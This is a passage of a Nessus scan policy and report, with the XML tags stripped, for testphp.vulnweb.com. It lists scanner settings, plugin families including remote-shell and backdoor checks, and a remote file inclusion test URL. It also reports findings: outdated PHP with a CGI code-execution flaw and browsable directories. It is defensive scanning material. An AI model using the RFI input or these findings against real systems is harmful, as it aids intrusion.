SSH key : + Passphrase for SSH key : + password + + + + + SSH settings + 14273 + SSH settings[radio]:Elevate privileges with : + Elevate privileges with : + radio + Nothing;sudo;su;su+sudo;dzdo;pbrun;Cisco 'enable' + Nothing;sudo;su;su+sudo;dzdo;pbrun;Cisco 'enable' + + + SSH settings + 14273 + SSH settings[entry]:Privilege elevation binary path (directory) : + Privilege elevation binary path (directory) : + entry + + + + + SSH settings + 14273 + SSH settings[entry]:su login : + su login : + entry + + + + + SSH settings + 14273 + SSH settings[entry]:Escalation account : + Escalation account : + entry + root + root + + + SSH settings + 14273 + SSH settings[password]:Escalation password : + Escalation password : + password + + + + + SSH settings + 14273 + SSH settings[file]:SSH known_hosts file : + SSH known_hosts file : + file + + + + + SSH settings + 14273 + SSH settings[entry]:Preferred SSH port : + Preferred SSH port : + entry + 22 + 22 + + + SSH settings + 14273 + SSH settings[entry]:Client version : + Client version : + entry + OpenSSH_5.0 + OpenSSH_5.0 + + + SSH settings + 14273 + SSH settings[entry]:Additional SSH user name (1) : + Additional SSH user name (1) : + entry + + + + + SSH settings + 14273 + SSH settings[password]:Additional SSH password (1) : + Additional SSH password (1) : + password + + + + + SSH settings + 14273 + SSH settings[entry]:Additional SSH user name (2) : + Additional SSH user name (2) : + entry + + + + + SSH settings + 14273 + SSH settings[password]:Additional SSH password (2) : + Additional SSH password (2) : + password + + + + + SSH settings + 14273 + SSH settings[entry]:Additional SSH user name (3) : + Additional SSH user name (3) : + entry + + + + + SSH settings + 14273 + SSH settings[password]:Additional SSH password (3) : + Additional SSH password (3) : + password + + + + + SSH settings + 14273 + SSH settings[entry]:Additional SSH user name (4) : + Additional SSH user name (4) : + entry + + + + + SSH settings + 14273 + SSH settings[password]:Additional SSH password (4) : + Additional SSH password (4) : + password + + + + + SSH settings + 14273 + SSH settings[entry]:Additional SSH user name (5) : + Additional SSH user name (5) : + entry + + + + + SSH settings + 14273 + SSH settings[password]:Additional SSH password (5) : + Additional SSH password (5) : + password + + + + + SSL Certificate Expiry + 15901 + SSL Certificate Expiry[entry]:Identify certificates that expire within x days + Identify certificates that expire within x days + entry + 60 + 60 + + + SMB Registry : Start the Registry Service during the scan + 35703 + SMB Registry : Start the Registry Service during the scan[checkbox]:Start the registry + service during the scan + + Start the registry service during the scan + checkbox + no + no + + + SMB Registry : Start the Registry Service during the scan + 35703 + SMB Registry : Start the Registry Service during the scan[checkbox]:Enable administrative + shares during the scan + + Enable administrative shares during the scan + checkbox + no + no + + + Patch Management: Symantec Altiris Settings + 78013 + Patch Management: Symantec Altiris Settings[entry]:Symantec Altiris Database Server : + + Symantec Altiris Database Server : + entry + + + + + Patch Management: Symantec Altiris Settings + 78013 + Patch Management: Symantec Altiris Settings[entry]:Symantec Altiris Database Port : + + Symantec Altiris Database Port : + entry + 5690 + 5690 + + + Patch Management: Symantec Altiris Settings + 78013 + Patch Management: Symantec Altiris Settings[entry]:Symantec Altiris Database Name : + + Symantec Altiris Database Name : + entry + Symantec_CMDB + Symantec_CMDB + + + Patch Management: Symantec Altiris Settings + 78013 + Patch Management: Symantec Altiris Settings[checkbox]:Symantec Altiris Use Windows + Credentials : + + Symantec Altiris Use Windows Credentials : + checkbox + no + no + + + Patch Management: Symantec Altiris Settings + 78013 + Patch Management: Symantec Altiris Settings[entry]:Symantec Altiris Database Username : + + Symantec Altiris Database Username : + entry + + + + + Patch Management: Symantec Altiris Settings + 78013 + Patch Management: Symantec Altiris Settings[password]:Symantec Altiris Database Password + : + + Symantec Altiris Database Password : + password + + + + + Unix File Contents Compliance Checks + 72095 + Unix File Contents Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Unix File Contents Compliance Checks + 72095 + Unix File Contents Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Unix File Contents Compliance Checks + 72095 + Unix File Contents Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Unix File Contents Compliance Checks + 72095 + Unix File Contents Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Unix File Contents Compliance Checks + 72095 + Unix File Contents Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Unix Compliance Checks + 21157 + Unix Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Unix Compliance Checks + 21157 + Unix Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Unix Compliance Checks + 21157 + Unix Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Unix Compliance Checks + 21157 + Unix Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Unix Compliance Checks + 21157 + Unix Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Unix Compliance Checks + 21157 + Unix Compliance Checks[radio]:Docker Scan Scope : + Docker Scan Scope : + radio + all + all + + + VMware vCenter/vSphere Compliance Checks + 64455 + VMware vCenter/vSphere Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + VMware vCenter/vSphere Compliance Checks + 64455 + VMware vCenter/vSphere Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + VMware vCenter/vSphere Compliance Checks + 64455 + VMware vCenter/vSphere Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + VMware vCenter/vSphere Compliance Checks + 64455 + VMware vCenter/vSphere Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + VMware vCenter/vSphere Compliance Checks + 64455 + VMware vCenter/vSphere Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + VMware SOAP API Settings + 57395 + VMware SOAP API Settings[entry]:VMware user name : + VMware user name : + entry + + + + + VMware SOAP API Settings + 57395 + VMware SOAP API Settings[password]:VMware password : + VMware password : + password + + + + + VMware SOAP API Settings + 57395 + VMware SOAP API Settings[checkbox]:Ignore SSL Certificate : + Ignore SSL Certificate : + checkbox + no + no + + + VMware SOAP API Settings + 57395 + VMware SOAP API Settings[entry]:Additional VMware user name (1) : + Additional VMware user name (1) : + entry + + + + + VMware SOAP API Settings + 57395 + VMware SOAP API Settings[password]:Additional VMware password (1) : + Additional VMware password (1) : + password + + + + + VMware SOAP API Settings + 57395 + VMware SOAP API Settings[checkbox]:Additional Ignore SSL Certificate (1) : + Additional Ignore SSL Certificate (1) : + checkbox + no + no + + + VMware SOAP API Settings + 57395 + VMware SOAP API Settings[entry]:Additional VMware user name (2) : + Additional VMware user name (2) : + entry + + + + + VMware SOAP API Settings + 57395 + VMware SOAP API Settings[password]:Additional VMware password (2) : + Additional VMware password (2) : + password + + + + + VMware SOAP API Settings + 57395 + VMware SOAP API Settings[checkbox]:Additional Ignore SSL Certificate (2) : + Additional Ignore SSL Certificate (2) : + checkbox + no + no + + + VMware SOAP API Settings + 57395 + VMware SOAP API Settings[entry]:Additional VMware user name (3) : + Additional VMware user name (3) : + entry + + + + + VMware SOAP API Settings + 57395 + VMware SOAP API Settings[password]:Additional VMware password (3) : + Additional VMware password (3) : + password + + + + + VMware SOAP API Settings + 57395 + VMware SOAP API Settings[checkbox]:Additional Ignore SSL Certificate (3) : + Additional Ignore SSL Certificate (3) : + checkbox + no + no + + + VMware SOAP API Settings + 57395 + VMware SOAP API Settings[entry]:Additional VMware user name (4) : + Additional VMware user name (4) : + entry + + + + + VMware SOAP API Settings + 57395 + VMware SOAP API Settings[password]:Additional VMware password (4) : + Additional VMware password (4) : + password + + + + + VMware SOAP API Settings + 57395 + VMware SOAP API Settings[checkbox]:Additional Ignore SSL Certificate (4) : + Additional Ignore SSL Certificate (4) : + checkbox + no + no + + + VMware SOAP API Settings + 57395 + VMware SOAP API Settings[entry]:Additional VMware user name (5) : + Additional VMware user name (5) : + entry + + + + + VMware SOAP API Settings + 57395 + VMware SOAP API Settings[password]:Additional VMware password (5) : + Additional VMware password (5) : + password + + + + + VMware SOAP API Settings + 57395 + VMware SOAP API Settings[checkbox]:Additional Ignore SSL Certificate (5) : + Additional Ignore SSL Certificate (5) : + checkbox + no + no + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[entry]:VMware vCenter host : + VMware vCenter host : + entry + + + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[entry]:VMware vCenter port : + VMware vCenter port : + entry + 443 + 443 + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[entry]:VMware vCenter user name : + VMware vCenter user name : + entry + + + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[password]:VMware vCenter password : + VMware vCenter password : + password + + + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[checkbox]:SSL : + SSL : + checkbox + yes + yes + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[checkbox]:Verify SSL Certificate : + Verify SSL Certificate : + checkbox + no + no + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[entry]:Additional VMware vCenter host (1) : + Additional VMware vCenter host (1) : + entry + + + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[entry]:Additional VMware vCenter port (1) : + Additional VMware vCenter port (1) : + entry + 443 + 443 + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[entry]:Additional VMware vCenter user name (1) : + + Additional VMware vCenter user name (1) : + entry + + + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[password]:Additional VMware vCenter password (1) : + + Additional VMware vCenter password (1) : + password + + + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[checkbox]:Additional SSL (1) : + Additional SSL (1) : + checkbox + yes + yes + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[checkbox]:Additional Verify SSL Certificate (1) : + + Additional Verify SSL Certificate (1) : + checkbox + no + no + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[entry]:Additional VMware vCenter host (2) : + Additional VMware vCenter host (2) : + entry + + + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[entry]:Additional VMware vCenter port (2) : + Additional VMware vCenter port (2) : + entry + 443 + 443 + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[entry]:Additional VMware vCenter user name (2) : + + Additional VMware vCenter user name (2) : + entry + + + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[password]:Additional VMware vCenter password (2) : + + Additional VMware vCenter password (2) : + password + + + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[checkbox]:Additional SSL (2) : + Additional SSL (2) : + checkbox + yes + yes + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[checkbox]:Additional Verify SSL Certificate (2) : + + Additional Verify SSL Certificate (2) : + checkbox + no + no + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[entry]:Additional VMware vCenter host (3) : + Additional VMware vCenter host (3) : + entry + + + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[entry]:Additional VMware vCenter port (3) : + Additional VMware vCenter port (3) : + entry + 443 + 443 + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[entry]:Additional VMware vCenter user name (3) : + + Additional VMware vCenter user name (3) : + entry + + + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[password]:Additional VMware vCenter password (3) : + + Additional VMware vCenter password (3) : + password + + + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[checkbox]:Additional SSL (3) : + Additional SSL (3) : + checkbox + yes + yes + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[checkbox]:Additional Verify SSL Certificate (3) : + + Additional Verify SSL Certificate (3) : + checkbox + no + no + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[entry]:Additional VMware vCenter host (4) : + Additional VMware vCenter host (4) : + entry + + + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[entry]:Additional VMware vCenter port (4) : + Additional VMware vCenter port (4) : + entry + 443 + 443 + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[entry]:Additional VMware vCenter user name (4) : + + Additional VMware vCenter user name (4) : + entry + + + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[password]:Additional VMware vCenter password (4) : + + Additional VMware vCenter password (4) : + password + + + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[checkbox]:Additional SSL (4) : + Additional SSL (4) : + checkbox + yes + yes + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[checkbox]:Additional Verify SSL Certificate (4) : + + Additional Verify SSL Certificate (4) : + checkbox + no + no + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[entry]:Additional VMware vCenter host (5) : + Additional VMware vCenter host (5) : + entry + + + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[entry]:Additional VMware vCenter port (5) : + Additional VMware vCenter port (5) : + entry + 443 + 443 + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[entry]:Additional VMware vCenter user name (5) : + + Additional VMware vCenter user name (5) : + entry + + + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[password]:Additional VMware vCenter password (5) : + + Additional VMware vCenter password (5) : + password + + + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[checkbox]:Additional SSL (5) : + Additional SSL (5) : + checkbox + yes + yes + + + VMware vCenter SOAP API Settings + 63060 + VMware vCenter SOAP API Settings[checkbox]:Additional Verify SSL Certificate (5) : + + Additional Verify SSL Certificate (5) : + checkbox + no + no + + + WatchGuard Compliance Checks + 86269 + WatchGuard Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + WatchGuard Compliance Checks + 86269 + WatchGuard Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + WatchGuard Compliance Checks + 86269 + WatchGuard Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + WatchGuard Compliance Checks + 86269 + WatchGuard Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + WatchGuard Compliance Checks + 86269 + WatchGuard Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + WatchGuard Compliance Checks + 86269 + WatchGuard Compliance Checks[file]:Offline config file (.txt or .zip) : + Offline config file (.txt or .zip) : + file + + + + + Web Application Tests Settings + 39471 + Web Application Tests Settings[checkbox]:Enable web applications tests + Enable web applications tests + checkbox + no + no + + + Web Application Tests Settings + 39471 + Web Application Tests Settings[entry]:Maximum run time (min) : + Maximum run time (min) : + entry + 60 + 60 + + + Web Application Tests Settings + 39471 + Web Application Tests Settings[checkbox]:Try all HTTP methods + Try all HTTP methods + checkbox + no + no + + + Web Application Tests Settings + 39471 + Web Application Tests Settings[radio]:Combinations of arguments values + Combinations of arguments values + radio + one value;some pairs;all pairs (slower but efficient);some combinations;all + combinations (extremely slow) + + one value;some pairs;all pairs (slower but efficient);some combinations;all + combinations (extremely slow) + + + + Web Application Tests Settings + 39471 + Web Application Tests Settings[checkbox]:HTTP Parameter Pollution + HTTP Parameter Pollution + checkbox + no + no + + + Web Application Tests Settings + 39471 + Web Application Tests Settings[radio]:Stop at first flaw + Stop at first flaw + radio + per CGI;per port (quicker);per parameter (slow);look for all flaws (slower) + + per CGI;per port (quicker);per parameter (slow);look for all flaws (slower) + + + + Web Application Tests Settings + 39471 + Web Application Tests Settings[checkbox]:Test embedded web servers + Test embedded web servers + checkbox + no + no + + + Web Application Tests Settings + 39471 + Web Application Tests Settings[entry]:URL for Remote File Inclusion : + URL for Remote File Inclusion : + entry + http://rfi.nessus.org/rfi.txt + http://rfi.nessus.org/rfi.txt + + + Web mirroring + 10662 + Web mirroring[entry]:Number of pages to mirror : + Number of pages to mirror : + entry + 1000 + 1000 + + + Web mirroring + 10662 + Web mirroring[entry]:Maximum depth : + Maximum depth : + entry + 6 + 6 + + + Web mirroring + 10662 + Web mirroring[entry]:Start page : + Start page : + entry + / + / + + + Web mirroring + 10662 + Web mirroring[entry]:Excluded items regex : + Excluded items regex : + entry + /server_privileges\.php|logout + /server_privileges\.php|logout + + + Web mirroring + 10662 + Web mirroring[checkbox]:Follow dynamic pages : + Follow dynamic pages : + checkbox + no + no + + + Malicious Process Detection + 59275 + Malicious Process Detection[file]:Additional MD5 hashes (optional) : + Additional MD5 hashes (optional) : + file + + + + + Malicious Process Detection + 59275 + Malicious Process Detection[file]:Known good MD5 hashes (optional) : + Known good MD5 hashes (optional) : + file + + + + + Malicious Process Detection + 59275 + Malicious Process Detection[file]:Yara rules file : + Yara rules file : + file + + + + + Malicious Process Detection + 59275 + Malicious Process Detection[checkbox]:disable_dns_resolution + disable_dns_resolution + checkbox + no + no + + + Malicious Process Detection + 59275 + Malicious Process Detection[checkbox]:enable_malware_scanning + enable_malware_scanning + checkbox + no + no + + + Wake-on-LAN + 52616 + Wake-on-LAN[file]:List of MAC addresses for Wake-on-LAN: + List of MAC addresses for Wake-on-LAN: + file + + + + + Wake-on-LAN + 52616 + Wake-on-LAN[entry]:Time to wait (in minutes) for the systems to boot: + Time to wait (in minutes) for the systems to boot: + entry + 5 + 5 + + + Patch Management: WSUS Server Settings + 57031 + Patch Management: WSUS Server Settings[entry]:WSUS Server : + WSUS Server : + entry + + + + + Patch Management: WSUS Server Settings + 57031 + Patch Management: WSUS Server Settings[entry]:WSUS Port : + WSUS Port : + entry + + + + + Patch Management: WSUS Server Settings + 57031 + Patch Management: WSUS Server Settings[entry]:WSUS Username : + WSUS Username : + entry + + + + + Patch Management: WSUS Server Settings + 57031 + Patch Management: WSUS Server Settings[password]:WSUS Password : + WSUS Password : + password + + + + + Patch Management: WSUS Server Settings + 57031 + Patch Management: WSUS Server Settings[checkbox]:SSL : + SSL : + checkbox + no + no + + + Patch Management: WSUS Server Settings + 57031 + Patch Management: WSUS Server Settings[checkbox]:Verify SSL Certificate : + Verify SSL Certificate : + checkbox + no + no + + + ZTE ROSNG Compliance Checks + 144328 + ZTE ROSNG Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + ZTE ROSNG Compliance Checks + 144328 + ZTE ROSNG Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + ZTE ROSNG Compliance Checks + 144328 + ZTE ROSNG Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + ZTE ROSNG Compliance Checks + 144328 + ZTE ROSNG Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + ZTE ROSNG Compliance Checks + 144328 + ZTE ROSNG Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + ZTE ROSNG Compliance Checks + 144328 + ZTE ROSNG Compliance Checks[file]:Offline config file (.txt or .zip) : + Offline config file (.txt or .zip) : + file + + + + + + + + MacOS X Local Security Checks + enabled + + + F5 Networks Local Security Checks + enabled + + + DNS + enabled + + + Gain a shell remotely + enabled + + + Solaris Local Security Checks + enabled + + + Port scanners + mixed + + + Web Servers + enabled + + + SMTP problems + enabled + + + Service detection + enabled + + + CGI abuses : XSS + enabled + + + Debian Local Security Checks + enabled + + + Mandriva Local Security Checks + enabled + + + Databases + enabled + + + Default Unix Accounts + enabled + + + Denial of Service + enabled + + + Settings + enabled + + + Palo Alto Local Security Checks + enabled + + + HP-UX Local Security Checks + enabled + + + Backdoors + enabled + + + VMware ESX Local Security Checks + enabled + + + NewStart CGSL Local Security Checks + enabled + + + SCADA + enabled + + + Oracle Linux Local Security Checks + enabled + + + General + enabled + + + PhotonOS Local Security Checks + enabled + + + Red Hat Local Security Checks + enabled + + + FreeBSD Local Security Checks + enabled + + + CGI abuses + enabled + + + Rocky Linux Local Security Checks + enabled + + + Tenable.ot + disabled + + + Netware + enabled + + + Windows : User management + enabled + + + Amazon Linux Local Security Checks + enabled + + + Peer-To-Peer File Sharing + enabled + + + Slackware Local Security Checks + enabled + + + SNMP + enabled + + + Fedora Local Security Checks + enabled + + + Gentoo Local Security Checks + enabled + + + Huawei Local Security Checks + enabled + + + Ubuntu Local Security Checks + enabled + + + Misc. + enabled + + + Alma Linux Local Security Checks + enabled + + + Virtuozzo Local Security Checks + enabled + + + FTP + enabled + + + Firewalls + enabled + + + Windows : Microsoft Bulletins + enabled + + + Junos Local Security Checks + enabled + + + SuSE Local Security Checks + enabled + + + Policy Compliance + disabled + + + Windows + enabled + + + OracleVM Local Security Checks + enabled + + + RPC + enabled + + + CentOS Local Security Checks + enabled + + + CISCO + enabled + + + AIX Local Security Checks + enabled + + + Scientific Linux Local Security Checks + enabled + + + Mobile Devices + enabled + + + + + 34220 + Netstat Portscanner (WMI) + Netstat Portscanner (WMI) + enabled + + + 14274 + Nessus SNMP Scanner + Nessus SNMP Scanner + enabled + + + 14272 + Netstat Portscanner (SSH) + Netstat Portscanner (SSH) + enabled + + + 10180 + Ping the remote host + Ping the remote host + enabled + + + 11219 + Nessus SYN scanner + Nessus SYN scanner + enabled + + + + + + + 1648044472 + Wed Mar 23 15:07:52 2022 + cpe:/a:php:php:5.1.6 -> PHP PHP + 1648044472 + false + Basic Network Scan + 138 + cpe:/a:nginx:nginx:1.19.0 -> Nginx + cpe:/a:php:php:5.6.40-38+ubuntu20.04.1+deb.sury.org+1 -> PHP PHP + CVE-2014-8626, CVE-2012-1172, + CVE-2012-1171, CVE-2012-0831, CVE-2012-0789, CVE-2012-0788, CVE-2012-0781, CVE-2012-0057, + CVE-2011-4885, CVE-2011-4566, CVE-2011-3379, CVE-2011-1398, CVE-2010-1130, CVE-2010-1129, + CVE-2010-1128, CVE-2009-5016, CVE-2009-4143, CVE-2009-4142, CVE-2009-4018, CVE-2009-4017, + CVE-2009-3558, CVE-2009-3557, CVE-2009-3294, CVE-2009-3293, CVE-2009-3292, CVE-2009-3291, + CVE-2009-2687, CVE-2009-1272, CVE-2009-1271, CVE-2008-7068, CVE-2008-5658, CVE-2008-5625, + CVE-2008-5624, CVE-2008-5557, CVE-2008-5498, CVE-2008-3660, CVE-2008-3659, CVE-2008-3658, + CVE-2008-2829, CVE-2008-2666, CVE-2008-2665, CVE-2008-2371, CVE-2007-5424, CVE-2007-4663, + CVE-2007-4662, CVE-2007-4661, CVE-2007-4660, CVE-2007-4659, CVE-2007-4658, CVE-2007-4652, + CVE-2007-4586, CVE-2007-4507, CVE-2007-4441, CVE-2007-4255, CVE-2007-4033, CVE-2007-4010, + CVE-2007-3806, CVE-2007-3799, CVE-2007-3790, CVE-2007-3378, CVE-2007-3294, CVE-2007-3007, + CVE-2007-2872, CVE-2007-2844, CVE-2007-2756, CVE-2007-1900, CVE-2007-1890, CVE-2007-1889, + CVE-2007-1888, CVE-2007-1887, CVE-2007-1886, CVE-2007-1885, CVE-2007-1884, CVE-2007-1835, + CVE-2007-1825, CVE-2007-1824, CVE-2007-1718, CVE-2007-1717, CVE-2007-1701, CVE-2007-1700, + CVE-2007-1649, CVE-2007-1584, CVE-2007-1583, CVE-2007-1454, CVE-2007-1453, CVE-2007-1452, + CVE-2007-1413, CVE-2007-1383, CVE-2007-1381, CVE-2007-1380, CVE-2007-1376, CVE-2007-1001, + CVE-2007-0988, CVE-2007-0910, CVE-2007-0909, CVE-2007-0908, CVE-2007-0907, CVE-2007-0906, + CVE-2007-0905, CVE-2007-0448, CVE-2006-7205, CVE-2006-6383, CVE-2006-5706, CVE-2006-5465, + CVE-2006-4812, CVE-2006-4625, CVE-2006-4486, CVE-2006-2660, CVE-2006-1549, CVE-2006-1015 + + 110 + PHP < 5.3.12 / 5.4.2 CGI Query String + Code Execution: Upgrade to PHP version 5.3.12 / 5.4.2 or later. A 'mod_rewrite' workaround + is available as well. + + cpe:/a:igor_sysoev:nginx:1.19.0 -> Nginx + cpe:/a:php:php:5.6.40 -> PHP PHP + cpe:/o:linux:linux_kernel -> Linux Kernel + cpe:/o:linux:linux_kernel + linux + 65 + SinFP + [{"FQDN":"testphp.vulnweb.com","sources":["get_host_report_name()","determine_fqdn()"]},{"FQDN":"ec2-44-228-249-3.us-west-2.compute.amazonaws.com","sources":["get_host_fqdn()"]}] + general-purpose + Linux Kernel 2.6 + 197 + 197 + 1648042696 + 1648042695 + 1648042695 + ? + ? + ? + ? + ? + ? + ? + ? + 10.20.0.254 + [{"predicted-os": "Microsoft Windows Server 2012 R2", + "confidence": 1},{"predicted-os": "Ubuntu 14.04 Linux Kernel 3.13", + "confidence": 6},{"predicted-os": "CentOS Linux 7 Linux Kernel 3.10", + "confidence": 1}] + + + P1:B10113:F0x12:W62727:O0204ffff:M1460: + P2:B10113:F0x12:W62643:O0204ffff0402080affffffff4445414401030307:M1460: + P3:B00000:F0x00:W0:O0:M0 + P4:190101_7_p=80R + + testphp.vulnweb.com + ec2-44-228-249-3.us-west-2.compute.amazonaws.com + 44.228.249.3 + 1648042311 + Wed Mar 23 14:31:51 2022 + + + all + By using information obtained from a Nessus scan, this plugin reports CPE (Common Platform + Enumeration) matches for various hardware and software products found on a host. + + Note that if an official CPE is not available for the product, this plugin computes the best + possible CPE based on the information available from the scan. + + cpe.nbin + 2022/02/14 + Common Platform Enumeration (CPE) + 2010/04/21 + combined + None + 1.118 + http://cpe.mitre.org/ + https://nvd.nist.gov/products/cpe + + n/a + It was possible to enumerate CPE names that matched on the remote system. + + The remote operating system matched the following CPE : + + cpe:/o:linux:linux_kernel -> Linux Kernel + + Following application CPE's matched on the remote system : + + cpe:/a:igor_sysoev:nginx:1.19.0 -> Nginx + cpe:/a:nginx:nginx:1.19.0 -> Nginx + cpe:/a:php:php:5.1.6 -> PHP PHP + cpe:/a:php:php:5.6.40 -> PHP PHP + cpe:/a:php:php:5.6.40-38+ubuntu20.04.1+deb.sury.org+1 -> PHP PHP + + + + all + 1 + This plugin displays, for each tested host, information about the scan itself : + + - The version of the plugin set. + - The type of scanner (Nessus or Nessus Home). + - The version of the Nessus Engine. + - The port scanner(s) used. + - The port range scanned. + - The ping round trip time + - Whether credentialed or third-party patch management checks are possible. + - Whether the display of superseded patches is enabled + - The date of the scan. + - The duration of the scan. + - The number of hosts scanned in parallel. + - The number of checks done in parallel. + + scan_info.nasl + 2021/09/27 + Nessus Scan Information + 2005/08/26 + summary + None + 1.106 + n/a + This plugin displays information about the Nessus scan. + Information about this scan : + + Nessus version : 10.1.1 + Nessus build : X20061 + Plugin feed version : 202203230748 + Scanner edition used : Nessus + Scanner OS : LINUX + Scanner distribution : ubuntu910-x86-64 + Scan type : Normal + Scan name : dummy scan + Scan policy used : Basic Network Scan + Scanner IP : 10.20.0.0.1 + Port scanner(s) : nessus_syn_scanner + Port range : default + Ping RTT : 184.503 ms + Thorough tests : no + Experimental tests : no + Paranoia level : 1 + Report verbosity : 1 + Safe checks : yes + Optimize the test : yes + Credentialed checks : no + Patch management checks : None + Display superseded patches : yes (supersedence plugin launched) + CGI scanning : enabled + Web application tests : disabled + Max hosts : 30 + Max checks : 4 + Recv timeout : 5 + Backports : None + Allow post-scan editing: Yes + Scan Start Date : 2022/3/23 14:32 CET + Scan duration : 2151 sec + + + + all + The remote host is missing one or more security patches. This plugin lists the newest + version of each patch to install to make sure the remote host is up-to-date. + + patches_summary.nbin + 2022/03/08 + Patch Report + 2013/07/08 + combined + None + 1.204 + Install the patches listed below. + The remote host is missing several patches. + + + . You need to take the following action : + + [ PHP < 5.3.12 / 5.4.2 CGI Query String Code Execution (58988) ] + + + Action to take : Upgrade to PHP version 5.3.12 / 5.4.2 or later. A 'mod_rewrite' + workaround is available as well. + + +Impact : Taking this action will resolve 110 different vulnerabilities (CVEs). + + + + + + 5.3 + CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + 5.0 + CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N + Multiple Nessus plugins identified directories on the web server that are browsable. + + browsable_web_dir.nasl + 2021/01/19 + Browsable Web Directories + 2009/09/15 + remote + Medium + 1.10 + http://www.nessus.org/u?0a35179e + Make sure that browsable directories do not leak confidential information or give access to + sensitive resources. Additionally, use access restrictions or disable directory indexing for any + that do. + + Some directories on the remote web server are browsable. + + The following directories are browsable : + + http://testphp.vulnweb.com/CVS/ + http://testphp.vulnweb.com/Templates/ + http://testphp.vulnweb.com/admin/ + http://testphp.vulnweb.com/images/ + + + + Based on the remote operating system, it is possible to determine what the remote system + type is (eg: a printer, router, general-purpose computer, etc). + + device_type.nasl + 2011/05/23 + Device Type + 2011/05/23 + combined + None + $Revision: 1.1 $ + n/a + It is possible to guess the remote device type. + Remote device type : general-purpose + Confidence level : 65 + + + + all + True + Using a combination of remote probes (e.g., TCP/IP, SMB, HTTP, NTP, SNMP, etc.), it is + possible to guess the name of the remote operating system in use. It is also possible sometimes to + guess the version of the operating system. + + os_fingerprint.nasl + True + 2022/03/09 + OS Identification + 2003/12/09 + combined + None + 2.61 + n/a + It is possible to guess the remote operating system. + + Remote operating system : Linux Kernel 2.6 + Confidence level : 65 + Method : SinFP + + + The remote host is running Linux Kernel 2.6 + + + + The remote web server contains a client access policy file. This is a simple XML file used + by Microsoft Silverlight to allow access to services that reside outside the exact web domain from + which a Silverlight control originated. + + true + clientaccesspolicy.nasl + 2021/01/19 + Web Site Client Access Policy File Detection + 2014/02/11 + remote + None + 1.5 + http://www.nessus.org/u?a4eeeaa2 + Review the contents of the policy file carefully. Improper policies, especially an + unrestricted one with just '*', could allow for cross- site request forgery or other + attacks against the web server. + + The remote web server contains a 'clientaccesspolicy.xml' file. + + Nessus was able to obtain a client access policy file from the + remote host at the following URL : + + GET /clientaccesspolicy.xml HTTP/1.1 + Host: testphp.vulnweb.com + Accept-Charset: 